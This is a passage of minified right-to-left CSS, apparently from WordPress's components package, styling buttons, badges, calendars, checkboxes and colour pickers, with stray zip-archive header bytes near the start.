(min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK! ۬ff!dist/components/style-rtl.min.cssnuȯ@charset "UTF-8";@media not (prefers-reduced-motion){.components-animate__appear{animation:components-animate__appear-animation .1s cubic-bezier(0,0,.2,1) 0s;animation-fill-mode:forwards}}.components-animate__appear.is-from-top,.components-animate__appear.is-from-top.is-from-left{transform-origin:top right}.components-animate__appear.is-from-top.is-from-right{transform-origin:top left}.components-animate__appear.is-from-bottom,.components-animate__appear.is-from-bottom.is-from-left{transform-origin:bottom right}.components-animate__appear.is-from-bottom.is-from-right{transform-origin:bottom left}@keyframes components-animate__appear-animation{0%{transform:translateY(-2em) scaleY(0) scaleX(0)}to{transform:translateY(0) scaleY(1) scaleX(1)}}@media not (prefers-reduced-motion){.components-animate__slide-in{animation:components-animate__slide-in-animation .1s cubic-bezier(0,0,.2,1);animation-fill-mode:forwards}.components-animate__slide-in.is-from-left{transform:translateX(-100%)}.components-animate__slide-in.is-from-right{transform:translateX(100%)}}@keyframes components-animate__slide-in-animation{to{transform:translateX(0)}}@media not (prefers-reduced-motion){.components-animate__loading{animation:components-animate__loading 1.6s ease-in-out infinite}}@keyframes components-animate__loading{0%{opacity:.5}50%{opacity:1}to{opacity:.5}}.components-autocomplete__popover .components-popover__content{min-width:200px;padding:8px}.components-autocomplete__result.components-button{display:flex;height:auto;min-height:36px;text-align:right;width:100%}.components-autocomplete__result.components-button:focus:not(:disabled){box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.components-badge{box-sizing:border-box}.components-badge *,.components-badge :after,.components-badge :before{box-sizing:inherit}.components-badge{background-color:color-mix(in srgb,#fff 90%,var(--base-color));border-radius:2px;color:color-mix(in srgb,#000 50%,var(--base-color));display:inline-block;line-height:0;max-width:100%;min-height:24px;padding:2px 8px}.components-badge:where(.is-default){background-color:#f0f0f0;color:#2f2f2f}.components-badge.has-icon{padding-inline-start:4px}.components-badge.is-info{--base-color:#3858e9}.components-badge.is-warning{--base-color:#f0b849}.components-badge.is-error{--base-color:#cc1818}.components-badge.is-success{--base-color:#4ab866}.components-badge__flex-wrapper{align-items:center;display:inline-flex;font-size:12px;font-weight:400;gap:2px;line-height:20px;max-width:100%}.components-badge__icon{flex-shrink:0}.components-badge__content{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.components-button-group{display:inline-block}.components-button-group .components-button{border-radius:0;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e;display:inline-flex}.components-button-group .components-button+.components-button{margin-right:-1px}.components-button-group .components-button:first-child{border-radius:0 2px 2px 0}.components-button-group .components-button:last-child{border-radius:2px 0 0 2px}.components-button-group .components-button.is-primary,.components-button-group .components-button:focus{position:relative;z-index:1}.components-button-group .components-button.is-primary{box-shadow:inset 0 0 0 1px #1e1e1e}.components-button{-webkit-appearance:none;background:none;border:0;cursor:pointer;display:inline-flex;font-family:inherit;font-size:13px;margin:0;text-decoration:none}@media not (prefers-reduced-motion){.components-button{transition:box-shadow .1s linear}}.components-button{align-items:center;border-radius:2px;box-sizing:border-box;color:var(--wp-components-color-foreground,#1e1e1e);height:36px;padding:6px 12px}.components-button.is-next-40px-default-size{height:40px}.components-button:hover:not(:disabled,[aria-disabled=true]),.components-button[aria-expanded=true]{color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-button:focus:not(:disabled){box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:3px solid #0000}.components-button.is-primary{background:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));color:var(--wp-components-color-accent-inverted,#fff);outline:1px solid #0000;text-decoration:none;text-shadow:none;white-space:nowrap}.components-button.is-primary:hover:not(:disabled){background:var(--wp-components-color-accent-darker-10,var(--wp-admin-theme-color-darker-10,#2145e6));color:var(--wp-components-color-accent-inverted,#fff)}.components-button.is-primary:active:not(:disabled){background:var(--wp-components-color-accent-darker-20,var(--wp-admin-theme-color-darker-20,#183ad6));border-color:var(--wp-components-color-accent-darker-20,var(--wp-admin-theme-color-darker-20,#183ad6));color:var(--wp-components-color-accent-inverted,#fff)}.components-button.is-primary:focus:not(:disabled){box-shadow:inset 0 0 0 1px var(--wp-components-color-background,#fff),0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-button.is-primary:disabled,.components-button.is-primary:disabled:active:enabled,.components-button.is-primary[aria-disabled=true],.components-button.is-primary[aria-disabled=true]:active:enabled,.components-button.is-primary[aria-disabled=true]:enabled{background:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));color:#fff6;outline:none}.components-button.is-primary:disabled:active:enabled:focus:enabled,.components-button.is-primary:disabled:focus:enabled,.components-button.is-primary[aria-disabled=true]:active:enabled:focus:enabled,.components-button.is-primary[aria-disabled=true]:enabled:focus:enabled,.components-button.is-primary[aria-disabled=true]:focus:enabled{box-shadow:inset 0 0 0 1px var(--wp-components-color-background,#fff),0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-button.is-primary.is-busy,.components-button.is-primary.is-busy:disabled,.components-button.is-primary.is-busy[aria-disabled=true]{background-image:linear-gradient(45deg,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 33%,var(--wp-components-color-accent-darker-20,var(--wp-admin-theme-color-darker-20,#183ad6)) 33%,var(--wp-components-color-accent-darker-20,var(--wp-admin-theme-color-darker-20,#183ad6)) 70%,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 70%);background-size:100px 100%;border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));color:var(--wp-components-color-accent-inverted,#fff)}.components-button.is-secondary,.components-button.is-tertiary{outline:1px solid #0000}.components-button.is-secondary:active:not(:disabled),.components-button.is-tertiary:active:not(:disabled){box-shadow:none}.components-button.is-secondary:disabled,.components-button.is-secondary[aria-disabled=true],.components-button.is-secondary[aria-disabled=true]:hover,.components-button.is-tertiary:disabled,.components-button.is-tertiary[aria-disabled=true],.components-button.is-tertiary[aria-disabled=true]:hover{background:#0000;color:#949494;transform:none}.components-button.is-secondary{background:#0000;box-shadow:inset 0 0 0 1px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)),0 0 0 currentColor;color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:1px solid #0000;white-space:nowrap}.components-button.is-secondary:hover:not(:disabled,[aria-disabled=true],.is-pressed){background:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 4%,#0000);box-shadow:inset 0 0 0 1px var(--wp-components-color-accent-darker-20,var(--wp-admin-theme-color-darker-20,#183ad6));color:var(--wp-components-color-accent-darker-20,var(--wp-admin-theme-color-darker-20,#183ad6))}.components-button.is-secondary:disabled:not(:focus),.components-button.is-secondary[aria-disabled=true]:hover:not(:focus),.components-button.is-secondary[aria-disabled=true]:not(:focus){box-shadow:inset 0 0 0 1px #ddd}.components-button.is-secondary:focus:not(:disabled){box-shadow:0 0 0 currentColor inset,0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-button.is-tertiary{background:#0000;color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));white-space:nowrap}.components-button.is-tertiary:hover:not(:disabled,[aria-disabled=true],.is-pressed){background:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 4%,#0000);color:var(--wp-components-color-accent-darker-20,var(--wp-admin-theme-color-darker-20,#183ad6))}.components-button.is-tertiary:active:not(:disabled,[aria-disabled=true]){background:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 8%,#0000)}p+.components-button.is-tertiary{margin-right:-6px}.components-button.is-tertiary:disabled:not(:focus),.components-button.is-tertiary[aria-disabled=true]:hover:not(:focus),.components-button.is-tertiary[aria-disabled=true]:not(:focus){box-shadow:none;outline:none}.components-button.is-destructive{--wp-components-color-accent:#cc1818;--wp-components-color-accent-darker-10:#9e1313;--wp-components-color-accent-darker-20:#710d0d}.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link){color:#cc1818}.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):hover:not(:disabled,[aria-disabled=true]){color:#710d0d}.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #cc1818}.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):active:not(:disabled,[aria-disabled=true]){background:#ccc}.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):disabled,.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link)[aria-disabled=true]{color:#949494}.components-button.is-destructive.is-secondary:hover:not(:disabled,[aria-disabled=true]),.components-button.is-destructive.is-tertiary:hover:not(:disabled,[aria-disabled=true]){background:#cc18180a}.components-button.is-destructive.is-secondary:active:not(:disabled,[aria-disabled=true]),.components-button.is-destructive.is-tertiary:active:not(:disabled,[aria-disabled=true]){background:#cc181814}.components-button.is-link{background:none;border:0;border-radius:0;box-shadow:none;color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));margin:0;outline:none;padding:0;text-align:right;text-decoration:underline}@media not (prefers-reduced-motion){.components-button.is-link{transition-duration:.05s;transition-property:border,background,color;transition-timing-function:ease-in-out}}.components-button.is-link{height:auto}.components-button.is-link:focus{border-radius:2px}.components-button.is-link:disabled,.components-button.is-link[aria-disabled=true]{color:#949494}.components-button:not(:disabled,[aria-disabled=true]):active{color:var(--wp-components-color-foreground,#1e1e1e)}.components-button:disabled,.components-button[aria-disabled=true]{color:#949494;cursor:default}@media not (prefers-reduced-motion){.components-button.is-busy,.components-button.is-secondary.is-busy,.components-button.is-secondary.is-busy:disabled,.components-button.is-secondary.is-busy[aria-disabled=true]{animation:components-button__busy-animation 2.5s linear infinite}}.components-button.is-busy,.components-button.is-secondary.is-busy,.components-button.is-secondary.is-busy:disabled,.components-button.is-secondary.is-busy[aria-disabled=true]{background-image:linear-gradient(45deg,#fafafa 33%,#e0e0e0 0,#e0e0e0 70%,#fafafa 0);background-size:100px 100%}.components-button.is-compact{height:32px}.components-button.is-compact.has-icon:not(.has-text){min-width:32px;padding:0}.components-button.is-small{font-size:11px;height:24px;line-height:22px;padding:0 8px}.components-button.is-small.has-icon:not(.has-text){min-width:24px;padding:0}.components-button.has-icon{justify-content:center;min-width:36px;padding:6px}.components-button.has-icon.is-next-40px-default-size{min-width:40px}.components-button.has-icon .dashicon{align-items:center;box-sizing:initial;display:inline-flex;justify-content:center;padding:2px}.components-button.has-icon.has-text{gap:4px;justify-content:start;padding-left:12px;padding-right:8px}.components-button.has-icon.has-text.has-icon-right{padding-left:8px;padding-right:12px}.components-button.is-pressed,.components-button.is-pressed:hover{color:var(--wp-components-color-foreground-inverted,#fff)}.components-button.is-pressed:hover:not(:disabled,[aria-disabled=true]),.components-button.is-pressed:not(:disabled,[aria-disabled=true]){background:var(--wp-components-color-foreground,#1e1e1e)}.components-button.is-pressed:disabled,.components-button.is-pressed[aria-disabled=true]{color:#949494}.components-button.is-pressed:disabled:not(.is-primary):not(.is-secondary):not(.is-tertiary),.components-button.is-pressed[aria-disabled=true]:not(.is-primary):not(.is-secondary):not(.is-tertiary){background:#949494;color:var(--wp-components-color-foreground-inverted,#fff)}.components-button.is-pressed:focus:not(:disabled){box-shadow:inset 0 0 0 1px var(--wp-components-color-background,#fff),0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-button svg{fill:currentColor;outline:none}@media (forced-colors:active){.components-button svg{fill:CanvasText}}.components-button .components-visually-hidden{height:auto}@keyframes components-button__busy-animation{0%{background-position:right 200px top 0}}.components-calendar{background-color:var(--wp-components-color-background,#fff);color:var(--wp-components-color-foreground,#1e1e1e);display:inline-block;font-size:13px;font-weight:400;position:relative;z-index:0}.components-calendar,.components-calendar *,.components-calendar :after,.components-calendar :before{box-sizing:border-box}.components-calendar__day{padding:0;position:relative}.components-calendar__day:has(.components-calendar__day-button:disabled){color:var(--wp-components-color-gray-600,#949494)}.components-calendar__day:has(.components-calendar__day-button:focus-visible),.components-calendar__day:has(.components-calendar__day-button:hover:not(:disabled)){color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-calendar__day-button{align-items:center;background:none;border:none;border-radius:2px;color:inherit;cursor:pointer;display:flex;font:inherit;font-variant-numeric:tabular-nums;height:32px;justify-content:center;margin:0;padding:0;position:relative;width:32px}.components-calendar__day-button:before{border:none;border-radius:2px;content:"";inset:0;position:absolute;z-index:-1}.components-calendar__day-button:after{content:"";inset:0;pointer-events:none;position:absolute;z-index:1}.components-calendar__day-button:disabled{cursor:revert}@media (forced-colors:active){.components-calendar__day-button:disabled{text-decoration:line-through}}.components-calendar__day-button:focus-visible{outline:var(--wp-admin-border-width-focus) solid var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline-offset:1px}.components-calendar__caption-label{align-items:center;border:0;display:inline-flex;position:relative;text-transform:capitalize;white-space:nowrap;z-index:1}.components-calendar__button-next,.components-calendar__button-previous{align-items:center;-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;border-radius:2px;color:inherit;cursor:pointer;display:inline-flex;height:32px;justify-content:center;margin:0;padding:0;position:relative;width:32px}.components-calendar__button-next:disabled,.components-calendar__button-next[aria-disabled=true],.components-calendar__button-previous:disabled,.components-calendar__button-previous[aria-disabled=true]{color:var(--wp-components-color-gray-600,#949494);cursor:revert}.components-calendar__button-next:focus-visible,.components-calendar__button-previous:focus-visible{outline:var(--wp-admin-border-width-focus) solid var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-calendar__chevron{display:inline-block;fill:currentColor;height:16px;width:16px}.components-calendar[dir=rtl] .components-calendar__nav .components-calendar__chevron{transform:rotate(-180deg);transform-origin:50%}.components-calendar__month-caption{align-content:center;display:flex;height:32px;justify-content:center;margin-bottom:12px}.components-calendar__months{display:flex;flex-wrap:wrap;gap:16px;justify-content:center;max-width:fit-content;position:relative}.components-calendar__month-grid{border-collapse:initial;border-spacing:0 4px}.components-calendar__nav{align-items:center;display:flex;height:32px;inset-block-start:0;inset-inline-end:0;inset-inline-start:0;justify-content:space-between;position:absolute}.components-calendar__weekday{color:var(--wp-components-color-gray-700,#757575);height:32px;padding:0;text-align:center;text-transform:uppercase;width:32px}.components-calendar__day--today:after{border:2px solid;border-radius:50%;content:"";height:0;inset-block-start:2px;inset-inline-end:2px;position:absolute;width:0;z-index:1}.components-calendar__day--selected:not(.components-calendar__range-middle):has(.components-calendar__day-button,.components-calendar__day-button:hover:not(:disabled)){color:var(--wp-components-color-foreground-inverted,#fff)}.components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:before{background-color:var(--wp-components-color-foreground,#1e1e1e);border:1px solid #0000}.components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:disabled:before{background-color:var(--wp-components-color-gray-600,#949494)}.components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:hover:not(:disabled):before{background-color:var(--wp-components-color-gray-800,#2f2f2f)}.components-calendar__day--hidden{visibility:hidden}.components-calendar__range-start:not(.components-calendar__range-end) .components-calendar__day-button,.components-calendar__range-start:not(.components-calendar__range-end) .components-calendar__day-button:before{border-end-end-radius:0;border-start-end-radius:0}.components-calendar__range-middle .components-calendar__day-button:before{background-color:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 4%,#0000);border-color:#0000;border-radius:0;border-style:solid;border-width:1px 0}.components-calendar__range-end:not(.components-calendar__range-start) .components-calendar__day-button,.components-calendar__range-end:not(.components-calendar__range-start) .components-calendar__day-button:before{border-end-start-radius:0;border-start-start-radius:0}.components-calendar__day--preview svg{color:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 16%,#0000);inset:0;pointer-events:none;position:absolute}@media (forced-colors:active){.components-calendar__day--preview svg{color:inherit}}.components-calendar[dir=rtl] .components-calendar__day--preview svg{transform:scaleX(-1)}.components-calendar__day--preview.components-calendar__range-middle .components-calendar__day-button:before{border:none}@keyframes slide-in-left{0%{transform:translateX(100%)}to{transform:translateX(0)}}@keyframes slide-in-right{0%{transform:translateX(-100%)}to{transform:translateX(0)}}@keyframes slide-out-left{0%{transform:translateX(0)}to{transform:translateX(100%)}}@keyframes slide-out-right{0%{transform:translateX(0)}to{transform:translateX(-100%)}}@keyframes fade-in{0%{opacity:0}to{opacity:1}}@keyframes fade-out{0%{opacity:1}to{opacity:0}}.components-calendar__caption-after-enter,.components-calendar__caption-after-exit,.components-calendar__caption-before-enter,.components-calendar__caption-before-exit,.components-calendar__weeks-after-enter,.components-calendar__weeks-after-exit,.components-calendar__weeks-before-enter,.components-calendar__weeks-before-exit{animation-duration:0s;animation-fill-mode:forwards;animation-timing-function:cubic-bezier(.4,0,.2,1)}@media not (prefers-reduced-motion){.components-calendar__caption-after-enter,.components-calendar__caption-after-exit,.components-calendar__caption-before-enter,.components-calendar__caption-before-exit,.components-calendar__weeks-after-enter,.components-calendar__weeks-after-exit,.components-calendar__weeks-before-enter,.components-calendar__weeks-before-exit{animation-duration:.3s}}.components-calendar[dir=rtl] .components-calendar__weeks-after-enter,.components-calendar__weeks-before-enter{animation-name:slide-in-left}.components-calendar[dir=rtl] .components-calendar__weeks-after-exit,.components-calendar__weeks-before-exit{animation-name:slide-out-left}.components-calendar[dir=rtl] .components-calendar__weeks-before-enter,.components-calendar__weeks-after-enter{animation-name:slide-in-right}.components-calendar[dir=rtl] .components-calendar__weeks-before-exit,.components-calendar__weeks-after-exit{animation-name:slide-out-right}.components-calendar__caption-after-enter{animation-name:fade-in}.components-calendar__caption-after-exit{animation-name:fade-out}.components-calendar__caption-before-enter{animation-name:fade-in}.components-calendar__caption-before-exit{animation-name:fade-out}.components-checkbox-control{--checkbox-input-size:24px}@media (min-width:600px){.components-checkbox-control{--checkbox-input-size:16px}}.components-checkbox-control{--checkbox-input-margin:8px}.components-checkbox-control__label{cursor:pointer;line-height:var(--checkbox-input-size)}.components-checkbox-control__input[type=checkbox]{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;margin-left:12px;padding:6px 8px;transition:none}@media not (prefers-reduced-motion){.components-checkbox-control__input[type=checkbox]{transition:box-shadow .1s linear}}@media (min-width:600px){.components-checkbox-control__input[type=checkbox]{font-size:13px;line-height:normal}}.components-checkbox-control__input[type=checkbox]:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color)}.components-checkbox-control__input[type=checkbox]::-webkit-input-placeholder{color:#1e1e1e9e}.components-checkbox-control__input[type=checkbox]::-moz-placeholder{color:#1e1e1e9e}.components-checkbox-control__input[type=checkbox]:-ms-input-placeholder{color:#1e1e1e9e}.components-checkbox-control__input[type=checkbox]:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color)}.components-checkbox-control__input[type=checkbox]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.components-checkbox-control__input[type=checkbox]:checked::-ms-check{opacity:0}.components-checkbox-control__input[type=checkbox]:checked:before,.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{color:#fff;margin:-3px -5px}@media (min-width:782px){.components-checkbox-control__input[type=checkbox]:checked:before,.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{margin:-4px -5px 0 0}}.components-checkbox-control__input[type=checkbox][aria-checked=mixed]{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{content:"\f460";display:inline-block;float:right;font:normal 30px/1 dashicons;vertical-align:middle;width:16px;speak:none;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media (min-width:782px){.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{float:none;font-size:21px}}.components-checkbox-control__input[type=checkbox]:disabled,.components-checkbox-control__input[type=checkbox][aria-disabled=true]{background:#f0f0f0;border-color:#ddd;cursor:default;opacity:1}.components-checkbox-control__input[type=checkbox]{appearance:none;background:#fff;clear:none;color:#1e1e1e;cursor:pointer;display:inline-block;height:var(--checkbox-input-size);line-height:0;margin:0 0 0 4px;outline:0;padding:0!important;text-align:center;vertical-align:top;width:var(--checkbox-input-size)}@media not (prefers-reduced-motion){.components-checkbox-control__input[type=checkbox]{transition:border-color .1s ease-in-out}}.components-checkbox-control__input[type=checkbox]:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:2px}.components-checkbox-control__input[type=checkbox]:checked,.components-checkbox-control__input[type=checkbox]:indeterminate{background:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-checkbox-control__input[type=checkbox]:checked::-ms-check,.components-checkbox-control__input[type=checkbox]:indeterminate::-ms-check{opacity:0}.components-checkbox-control__input[type=checkbox]:checked:before{content:none}.components-checkbox-control__input-container{aspect-ratio:1;display:inline-block;flex-shrink:0;line-height:1;margin-left:var(--checkbox-input-margin);position:relative;vertical-align:middle;width:var(--checkbox-input-size)}svg.components-checkbox-control__checked,svg.components-checkbox-control__indeterminate{--checkmark-size:var(--checkbox-input-size);fill:#fff;cursor:pointer;height:var(--checkmark-size);pointer-events:none;position:absolute;right:50%;top:50%;transform:translate(50%,-50%);-webkit-user-select:none;user-select:none;width:var(--checkmark-size)}@media (min-width:600px){svg.components-checkbox-control__checked,svg.components-checkbox-control__indeterminate{--checkmark-size:calc(var(--checkbox-input-size) + 4px)}}.components-checkbox-control__help{display:inline-block;margin-inline-start:calc(var(--checkbox-input-size) + var(--checkbox-input-margin))}.components-circular-option-picker{display:inline-block;min-width:188px;width:100%}.components-circular-option-picker .components-circular-option-picker__custom-clear-wrapper{display:flex;justify-content:flex-end;margin-top:12px}.components-circular-option-picker .components-circular-option-picker__swatches{display:flex;flex-wrap:wrap;gap:12px;position:relative;z-index:1}.components-circular-option-picker>:not(.components-circular-option-picker__swatches){position:relative;z-index:0}.components-circular-option-picker__option-wrapper{display:inline-block;height:28px;transform:scale(1);vertical-align:top;width:28px}@media not (prefers-reduced-motion){.components-circular-option-picker__option-wrapper{transition:transform .1s ease;will-change:transform}}.components-circular-option-picker__option-wrapper:hover{transform:scale(1.2)}.components-circular-option-picker__option-wrapper>div{height:100%;width:100%}.components-circular-option-picker__option-wrapper:before{background:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='28' height='28' fill='none'%3E%3Cpath fill='%23555d65' d='M6 8V6H4v2zm2 0V6h2v2zm2 8H8v-2h2zm2 0v-2h2v2zm0 2v-2h-2v2H8v2h2v-2zm2 0v2h-2v-2zm2 0h-2v-2h2z'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M18 18h2v-2h-2v-2h2v-2h-2v-2h2V8h-2v2h-2V8h-2v2h2v2h-2v2h2v2h2zm-2-4v-2h2v2z' clip-rule='evenodd'/%3E%3Cpath fill='%23555d65' d='M18 18v2h-2v-2z'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M8 10V8H6v2H4v2h2v2H4v2h2v2H4v2h2v2H4v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2v2h-2V4h-2v2h-2V4h-2v2h-2V4h-2v2h2v2h-2v2zm0 2v-2H6v2zm2 0v-2h2v2zm0 2v-2H8v2H6v2h2v2H6v2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h-2v2h-2V6h-2v2h-2v2h2v2h-2v2z' clip-rule='evenodd'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M4 0H2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2V2h2V0h-2v2h-2V0h-2v2h-2V0h-2v2h-2V0h-2v2h-2V0h-2v2H8V0H6v2H4zm0 4V2H2v2zm2 0V2h2v2zm0 2V4H4v2H2v2h2v2H2v2h2v2H2v2h2v2H2v2h2v2H2v2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2V2h-2v2h-2V2h-2v2h-2V2h-2v2h-2V2h-2v2H8v2z' clip-rule='evenodd'/%3E%3C/svg%3E");border-radius:50%;bottom:1px;content:"";left:1px;position:absolute;right:1px;top:1px;z-index:-1}.components-circular-option-picker__option{aspect-ratio:1;background:#0000;border:none;border-radius:50%;box-shadow:inset 0 0 0 14px;display:inline-block;height:100%!important;vertical-align:top}@media not (prefers-reduced-motion){.components-circular-option-picker__option{transition:box-shadow .1s ease}}.components-circular-option-picker__option{cursor:pointer}.components-circular-option-picker__option:hover{box-shadow:inset 0 0 0 14px!important}.components-circular-option-picker__option[aria-pressed=true],.components-circular-option-picker__option[aria-selected=true]{box-shadow:inset 0 0 0 4px;overflow:visible;position:relative;z-index:1}.components-circular-option-picker__option[aria-pressed=true]+svg,.components-circular-option-picker__option[aria-selected=true]+svg{border-radius:50%;pointer-events:none;position:absolute;right:2px;top:2px;z-index:2}.components-circular-option-picker__option:after{border:1px solid #0000;border-radius:50%;bottom:-1px;box-shadow:inset 0 0 0 1px #0003;box-sizing:inherit;content:"";left:-1px;position:absolute;right:-1px;top:-1px}.components-circular-option-picker__option:focus:after{border:2px solid #757575;border-radius:50%;box-shadow:inset 0 0 0 2px #fff;content:"";height:calc(100% + 4px);position:absolute;right:50%;top:50%;transform:translate(50%,-50%);width:calc(100% + 4px)}.components-circular-option-picker__option.components-button:focus{background-color:initial;box-shadow:inset 0 0 0 14px;outline:none}.components-circular-option-picker__button-action .components-circular-option-picker__option{background:#fff;color:#fff}.components-circular-option-picker__dropdown-link-action{margin-left:16px}.components-circular-option-picker__dropdown-link-action .components-button{line-height:22px}.components-palette-edit__popover-gradient-picker{padding:8px;width:260px}.components-dropdown-menu__menu .components-palette-edit__menu-button{width:100%}.component-color-indicator{background:#fff linear-gradient(45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0);border-radius:50%;box-shadow:inset 0 0 0 1px #0003;display:inline-block;height:20px;padding:0;width:20px}.components-combobox-control{width:100%}input.components-combobox-control__input[type=text]{background:var(--wp-components-color-background,#fff);border:none;box-shadow:none;color:var(--wp-components-color-foreground,#1e1e1e);font-family:inherit;font-size:16px;line-height:inherit;margin:0;min-height:auto;padding:2px;width:100%}@media (min-width:600px){input.components-combobox-control__input[type=text]{font-size:13px}}input.components-combobox-control__input[type=text]:focus{box-shadow:none;outline:none}.components-combobox-control__suggestions-container{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.components-combobox-control__suggestions-container{transition:box-shadow .1s linear}}@media (min-width:600px){.components-combobox-control__suggestions-container{font-size:13px;line-height:normal}}.components-combobox-control__suggestions-container:focus{border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));box-shadow:0 0 0 .5px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-combobox-control__suggestions-container::-webkit-input-placeholder{color:#1e1e1e9e}.components-combobox-control__suggestions-container::-moz-placeholder{color:#1e1e1e9e}.components-combobox-control__suggestions-container:-ms-input-placeholder{color:#1e1e1e9e}.components-combobox-control__suggestions-container{align-items:flex-start;display:flex;flex-wrap:wrap;padding:0;width:100%}.components-combobox-control__suggestions-container:focus-within{border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));box-shadow:0 0 0 .5px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-combobox-control__suggestions-container .components-spinner{margin:0}.components-color-palette__custom-color-wrapper{position:relative;z-index:0}.components-color-palette__custom-color-button{background:none;border:none;border-radius:4px 4px 0 0;box-shadow:inset 0 0 0 1px #0003;box-sizing:border-box;cursor:pointer;height:64px;outline:1px solid #0000;position:relative;width:100%}.components-color-palette__custom-color-button:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) 